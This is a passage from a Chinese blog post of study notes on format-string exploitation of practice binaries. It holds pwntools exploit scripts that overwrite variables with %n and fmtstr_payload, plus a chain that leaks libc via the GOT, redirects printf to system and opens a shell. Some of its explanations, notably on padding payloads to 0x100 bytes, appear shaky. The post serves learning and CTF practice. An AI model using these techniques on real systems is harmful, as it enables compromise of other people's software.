<h5 id="脚本-2"><a href="#脚本-2" class="headerlink" title="脚本"></a><strong>脚本</strong></h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p = process(&quot;./overwrite&quot;)</span><br><span class="line">elf = ELF(&quot;./overwrite&quot;)</span><br><span class="line">#gdb.attach(p,&quot;b printf&quot;)</span><br><span class="line">a=int(p.recvuntil(&quot;\n&quot;,drop=True),16)</span><br><span class="line">print(hex(a))</span><br><span class="line">b=0x0804A028</span><br><span class="line">payload=b&#x27;aa&#x27;+b&#x27;%10$n&#x27;+b&#x27;b&#x27;+p32(b)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">info=p.recvline()</span><br><span class="line">if b&quot;overwrite b for a small value&quot; in info:</span><br><span class="line">  print(b&quot;Success\n&quot;)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><strong>为什么不能按照覆盖 <code>a</code> 的方法？</strong>（因为%n，b的地址已经超过2了，所以b的地址只能在%_$n之后）</p>
<ol>
<li><strong>偏移量计算的差异</strong>： 在覆盖 <code>a</code> 的方法中，<code>p32(a_addr)</code> 放在了 payload 的最开头，并且 <code>printf</code> 发现这个开头在它的参数列表中是<strong>第 8 个</strong>。 但是，如果将 <code>p32(b_addr)</code> 也放在 payload 的开头并尝试用 <code>%8$n</code> 写入，可能会遇到问题：<ul>
<li><strong>地址值与格式符冲突</strong>：<code>0x0804A028</code> 这个地址本身如果被 <code>printf</code> 解析成格式化字符串的一部分，可能会包含 <code>%</code> 或其他特殊字符，导致 <code>printf</code> 崩溃或行为异常。例如，地址的某个字节可能被解释为 <code>%s</code> 或 <code>%x</code> 的一部分，导致 <code>printf</code> 试图读取无效的内存地址。</li>
<li><strong>控制性问题</strong>：我们通常希望将要写入的地址放在格式字符串的末尾，这样它就不会被 <code>printf</code> 误认为是格式符的一部分来处理，而只是一个普通的 4 字节数据。</li>
</ul>
</li>
</ol>
<table>
<thead>
<tr>
<th>特性</th>
<th>覆盖 <code>v1</code> (局部变量)</th>
<th>覆盖 <code>b</code> (全局变量)</th>
</tr>
</thead>
<tbody><tr>
<td><strong>目标类型</strong></td>
<td>栈上的局部变量</td>
<td>数据段上的全局变量</td>
</tr>
<tr>
<td><strong>地址来源</strong></td>
<td>运行时泄露 (每次可能不同)</td>
<td>静态固定 (编译时确定)</td>
</tr>
<tr>
<td><strong><code>p32(addr)</code> 位置</strong></td>
<td>放在 <code>payload</code> 的<strong>开头</strong></td>
<td>放在 <code>payload</code> 的<strong>末尾</strong></td>
</tr>
<tr>
<td><strong><code>%n</code> 偏移</strong></td>
<td><code>8$</code> (因为地址放在开头，且在第 8 个参数位置)</td>
<td><code>10$</code> (因为地址放在末尾，且在第 10 个参数位置)</td>
</tr>
<tr>
<td><strong>主要考量</strong></td>
<td>确保 <code>p32(addr)</code> 不被误解为格式符，且在正确偏移</td>
<td>避免 <code>b_addr</code> 字节被误解为格式符，更稳定地作为参数地址</td>
</tr>
</tbody></table>
<p>好的，如果你确认这个 <code>b</code> 是<strong>必须的</strong>，那么它在 payload 中的存在，就意味着它在栈的布局和 <code>printf</code> 对参数的解析中起到了关键作用，通常是<strong>保证了 <code>p32(b_addr)</code> 的正确对齐，使其落在 <code>%10$n</code> 预期的参数位置</strong>。</p>
<p>让我们来详细分析，为什么多一个 <code>b</code> 反而可能成为“必须的”。</p>
<p><strong>有 <code>b</code> 的详细分析</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = b&quot;aa&quot; + b&quot;%10$n&quot; + b&quot;b&quot; + p32(b_addr)</span><br></pre></td></tr></table></figure>

<p>让我们计算每个部分的长度：</p>
<ol>
<li><code>b&quot;aa&quot;</code>：2 字节</li>
<li><code>b&quot;%10$n&quot;</code>：5 字节</li>
<li><code>b&quot;b&quot;</code>：1 字节</li>
<li><code>p32(b_addr)</code>：4 字节 (假设 <code>b_addr</code> 是 <code>0x0804A028</code>)</li>
</ol>
<p><strong>总字节数 &#x3D; 2 + 5 + 1 + 4 &#x3D; 12 字节</strong>,在这里，b是为了补足字节</p>
<h4 id="c的处理（全局大数）"><a href="#c的处理（全局大数）" class="headerlink" title="c的处理（全局大数）"></a>c的处理（全局大数）</h4><p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721200707341.png"  alt="image-20250721200707341"></p>
<p>这是一个很大的数，考虑逐字节写入</p>
<p>这里想把c覆盖为0x12345678，而c的地址是0x0804A02C，所以基本目标是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0x0804A02C:\x78</span><br><span class="line">0x0804A02D:\x56</span><br><span class="line">0x0804A02E:\x34</span><br><span class="line">0x0804A02F:\x12</span><br></pre></td></tr></table></figure>

<h5 id="脚本-3"><a href="#脚本-3" class="headerlink" title="脚本"></a><strong>脚本</strong></h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p=process(&quot;./overwrite&quot;)</span><br><span class="line"></span><br><span class="line">a=int(p.recvuntil(&quot;\n&quot;,drop=True),16)</span><br><span class="line">print(hex(a))</span><br><span class="line"></span><br><span class="line">c=0x0804A02C</span><br><span class="line">payload=fmtstr_payload(offset=8,writes=&#123;c:0x12345678&#125;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">info =p.recvline()</span><br><span class="line">if b&quot;overwrite c for a big value&quot; in info:</span><br><span class="line">  print(b&quot;Success&quot;)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h4 id="fmtstr-payload"><a href="#fmtstr-payload" class="headerlink" title="fmtstr_payload"></a>fmtstr_payload</h4><p><code>fmtstr_payload</code> 是 <strong>pwntools 提供的一个自动化工具</strong> ，用于<strong>构造格式化字符串漏洞（Format String Vulnerability）的 payload</strong> 。</p>
<p>它的作用是：</p>
<blockquote>
<p><strong>自动计算字符数并构造 payload，用于写入任意地址的值（如 GOT 表、变量、返回地址等）</strong> </p>
</blockquote>
<p>🧪 <code>fmtstr_payload</code> 的使用方法</p>
<ol>
<li><strong>基本语法</strong></li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">fmtstr_payload(offset, writes, numbwritten=0, write_size=&#x27;byte&#x27;)</span><br></pre></td></tr></table></figure>

<ol start="2">
<li><strong>参数说明</strong></li>
</ol>
<table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><code>offset</code></td>
<td>格式化字符串偏移量（你的输入在第几个<code>%p</code>的位置）</td>
</tr>
<tr>
<td><code>writes</code></td>
<td>一个字典，表示你要写入的地址和值，如<code>&#123;addr1: value1, addr2: value2&#125;</code></td>
</tr>
<tr>
<td><code>numbwritten</code></td>
<td>已经输出的字符数（默认为 0，可以忽略）</td>
</tr>
<tr>
<td><code>write_size</code></td>
<td>写入大小，可选：<code>&#39;byte&#39;</code>、<code>&#39;short&#39;</code>、<code>&#39;int&#39;</code>（默认是<code>&#39;byte&#39;</code>）</td>
</tr>
</tbody></table>
<p>🧩 示例 1：写入一个地址为 16</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">elf = ELF(&quot;./vuln&quot;)</span><br><span class="line">offset = 8  # 偏移量</span><br><span class="line">addr = elf.symbols[&#x27;a&#x27;]  # 假设你要写入变量 a 的地址</span><br><span class="line"></span><br><span class="line"># 构造 payload：写入 a = 16</span><br><span class="line">payload = fmtstr_payload(offset, &#123;addr: 16&#125;)</span><br><span class="line"></span><br><span class="line">p = process(&quot;./vuln&quot;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<p>🧩 示例 2：写入多个地址（如 <code>a=16</code>, <code>b=2</code>, <code>c=0x12345678</code>）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">elf = ELF(&quot;./vuln&quot;)</span><br><span class="line">offset = 8</span><br><span class="line">a_addr = elf.symbols[&#x27;a&#x27;]</span><br><span class="line">b_addr = elf.symbols[&#x27;b&#x27;]</span><br><span class="line">c_addr = elf.symbols[&#x27;c&#x27;]</span><br><span class="line"></span><br><span class="line"># 构造 payload：写入多个地址</span><br><span class="line">writes = &#123;</span><br><span class="line">    a_addr: 16,</span><br><span class="line">    b_addr: 2,</span><br><span class="line">    c_addr: 0x12345678</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">payload = fmtstr_payload(offset, writes, write_size=&#x27;int&#x27;)</span><br><span class="line">p = process(&quot;./vuln&quot;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>







<h3 id="fmt-demo（格式化字符串的综合利用）"><a href="#fmt-demo（格式化字符串的综合利用）" class="headerlink" title="fmt_demo（格式化字符串的综合利用）"></a>fmt_demo（格式化字符串的综合利用）</h3><p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721203303330.png"  alt="image-20250721203303330"></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250721212854956.png"  alt="image-20250721212854956"></p>
<p>可以先泄露libc的基址，得到system函数的地址</p>
<p>再根据此把printf的got表存储的地址换为system函数的地址</p>
<p>之后输入参数“&#x2F;bin&#x2F;sh”,就可以实现</p>
<h4 id="脚本-4"><a href="#脚本-4" class="headerlink" title="脚本"></a>脚本</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">from LibcSearcher import LibcSearcher</span><br><span class="line">p=process(&quot;./fmt_demo&quot;)</span><br><span class="line">elf=ELF(&quot;./fmt_demo&quot;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">read_got=elf.got[&quot;read&quot;]</span><br><span class="line">payload=p32(read_got)+b&quot;%4$s&quot;</span><br><span class="line">p.send(payload.ljust(0x100,b&quot;\x00&quot;))</span><br><span class="line">read=u32(p.recv(8)[4:])</span><br><span class="line">print(hex(read))</span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(&quot;read&quot;,read)</span><br><span class="line">libc_base=read-libc.dump(&quot;read&quot;)</span><br><span class="line">system=libc_base+libc.dump(&quot;system&quot;)</span><br><span class="line"></span><br><span class="line">payload=fmtstr_payload(offset=4,writes=&#123;elf.got[&quot;printf&quot;]:system&#125;)</span><br><span class="line">p.sendline(payload.ljust(0x100,b&quot;\x00&quot;))</span><br><span class="line"></span><br><span class="line">bin=b&quot;/bin/sh&quot;</span><br><span class="line">p.sendline(bin.ljust(0x100,b&quot;\x00&quot;))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>









<blockquote>
<p><strong>那为什么还要填补 payload 的长度为 0x100 字节？”</strong></p>
</blockquote>
<p>我们来从 <strong>“payload 被复制到栈上”</strong> 这个现象出发，解释为什么我们<strong>有意地</strong> 将 payload 填充到固定长度（如 0x100 字节），尽管它可能会被复制到栈上。</p>
<p>✅ 简短回答：</p>
<blockquote>
<p><strong>我们填补 payload 到固定长度（如 0x100 字节），是为了让 payload 被完整复制到栈上，从而让偏移固定、布局可控，便于利用格式化字符串漏洞进行地址泄露或写入操作。</strong> </p>
</blockquote>
<p>📌 payload 的两种“命运”：</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>1️⃣ payload 短</td>
<td>&lt; 一些参数长度</td>
<td><code>printf</code>从栈上读取参数</td>
<td>payload 在 buf 中，参数在栈上</td>
</tr>
<tr>
<td>2️⃣ payload 长</td>
<td>&gt; 一定长度（如 100 字节）</td>
<td><code>printf</code>把 payload 复制到栈上</td>
<td>payload 本身就在栈上</td>
</tr>
</tbody></table>
<p>🧩 为什么要“故意”让 payload 被复制到栈上？</p>
<p>✅ 优点一：<strong>偏移固定，便于调试</strong></p>
<ul>
<li>payload 被复制到栈上后，它在栈上的位置是固定的。</li>
<li>我们可以精准控制偏移（比如 <code>%4$s</code> 就一定读取 payload 中的地址）。</li>
<li>避免了因 payload 长度不同导致偏移变化的问题。</li>
</ul>
<p>✅ 优点二：<strong>便于构造写入操作（如 %n）</strong></p>
<ul>
<li>当我们想用 <code>%n</code> 写某个地址时，需要确保地址在栈上，且偏移固定。</li>
<li>如果 payload 被复制到栈上，我们就可以把地址放在 payload 开头，然后用 <code>%1$n</code> 精准写入。</li>
</ul>
<p>✅ 优点三：<strong>防止 payload 被截断或偏移漂移</strong></p>
<ul>
<li>如果 payload 长度不固定，可能导致偏移变化，<code>%s</code>、<code>%n</code> 读写错误地址。</li>
<li>填充到固定长度（如 0x100）可以避免这种漂移。</li>
</ul>
<p>:grey_question:但我其实不太理解   </p>

                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/PWN/">PWN</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/">格式化字符串</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="分享到 QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="分享到微信"
            data-tooltip-img-tip="微信扫一扫"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="分享到微博"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/07/22/ciscn-2019-sw-1/"
                                   title="ciscn_2019_sw_1"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">ciscn_2019_sw_1</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/07/20/ret2libc-printf/"
                                   title="ret2libc-printf"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">ret2libc-printf</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">1.</span> <span class="nav-text">原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%F0%9F%A7%B1-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%AC%A6%E5%8F%B7"><span class="nav-number">1.1.</span> <span class="nav-text">🧱 常见的格式化字符串符号</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#leakmemory-%E6%B3%84%E9%9C%B2%E6%A0%88%E4%B8%8A%E5%86%85%E5%AE%B9"><span class="nav-number">2.1.</span> <span class="nav-text">leakmemory(泄露栈上内容)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#leakmemory-%E6%B3%84%E9%9C%B2%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="nav-number">2.2.</span> <span class="nav-text">leakmemory(泄露任意地址内存)</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC"><span class="nav-number">2.2.1.</span> <span class="nav-text">脚本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E5%AE%8C%E6%95%B4%E8%BF%87%E7%A8%8B"><span class="nav-number">2.2.2.</span> <span class="nav-text">函数调用完整过程</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#overwrite-%E8%A6%86%E7%9B%96%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="nav-number">2.3.</span> <span class="nav-text">overwrite(覆盖任意地址内存)</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#a%E7%9A%84%E5%A4%84%E7%90%86%EF%BC%88%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%EF%BC%89"><span class="nav-number">2.3.1.</span> <span class="nav-text">a的处理（局部变量）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-1"><span class="nav-number">2.3.1.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#b%E7%9A%84%E5%A4%84%E7%90%86%EF%BC%88%E5%85%A8%E5%B1%80%E5%B0%8F%E6%95%B0%EF%BC%89"><span class="nav-number">2.3.2.</span> <span class="nav-text">b的处理（全局小数）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-2"><span class="nav-number">2.3.2.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#c%E7%9A%84%E5%A4%84%E7%90%86%EF%BC%88%E5%85%A8%E5%B1%80%E5%A4%A7%E6%95%B0%EF%BC%89"><span class="nav-number">2.3.3.</span> <span class="nav-text">c的处理（全局大数）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-3"><span class="nav-number">2.3.3.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#fmtstr-payload"><span class="nav-number">2.3.4.</span> <span class="nav-text">fmtstr_payload</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fmt-demo%EF%BC%88%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9A%84%E7%BB%BC%E5%90%88%E5%88%A9%E7%94%A8%EF%BC%89"><span class="nav-number">2.4.</span> <span class="nav-text">fmt_demo（格式化字符串的综合利用）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-4"><span class="nav-number">2.4.1.</span> <span class="nav-text">脚本</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
    &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2026
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">zach0ry</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">1.</span> <span class="nav-text">原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%F0%9F%A7%B1-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%AC%A6%E5%8F%B7"><span class="nav-number">1.1.</span> <span class="nav-text">🧱 常见的格式化字符串符号</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#leakmemory-%E6%B3%84%E9%9C%B2%E6%A0%88%E4%B8%8A%E5%86%85%E5%AE%B9"><span class="nav-number">2.1.</span> <span class="nav-text">leakmemory(泄露栈上内容)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#leakmemory-%E6%B3%84%E9%9C%B2%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="nav-number">2.2.</span> <span class="nav-text">leakmemory(泄露任意地址内存)</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC"><span class="nav-number">2.2.1.</span> <span class="nav-text">脚本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E5%AE%8C%E6%95%B4%E8%BF%87%E7%A8%8B"><span class="nav-number">2.2.2.</span> <span class="nav-text">函数调用完整过程</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#overwrite-%E8%A6%86%E7%9B%96%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="nav-number">2.3.</span> <span class="nav-text">overwrite(覆盖任意地址内存)</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#a%E7%9A%84%E5%A4%84%E7%90%86%EF%BC%88%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%EF%BC%89"><span class="nav-number">2.3.1.</span> <span class="nav-text">a的处理（局部变量）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-1"><span class="nav-number">2.3.1.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#b%E7%9A%84%E5%A4%84%E7%90%86%EF%BC%88%E5%85%A8%E5%B1%80%E5%B0%8F%E6%95%B0%EF%BC%89"><span class="nav-number">2.3.2.</span> <span class="nav-text">b的处理（全局小数）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-2"><span class="nav-number">2.3.2.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#c%E7%9A%84%E5%A4%84%E7%90%86%EF%BC%88%E5%85%A8%E5%B1%80%E5%A4%A7%E6%95%B0%EF%BC%89"><span class="nav-number">2.3.3.</span> <span class="nav-text">c的处理（全局大数）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-3"><span class="nav-number">2.3.3.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#fmtstr-payload"><span class="nav-number">2.3.4.</span> <span class="nav-text">fmtstr_payload</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fmt-demo%EF%BC%88%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9A%84%E7%BB%BC%E5%90%88%E5%88%A9%E7%94%A8%EF%BC%89"><span class="nav-number">2.4.</span> <span class="nav-text">fmt_demo（格式化字符串的综合利用）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-4"><span class="nav-number">2.4.1.</span> <span class="nav-text">脚本</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
            
<script src="/js/post/share.js"></script>

        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
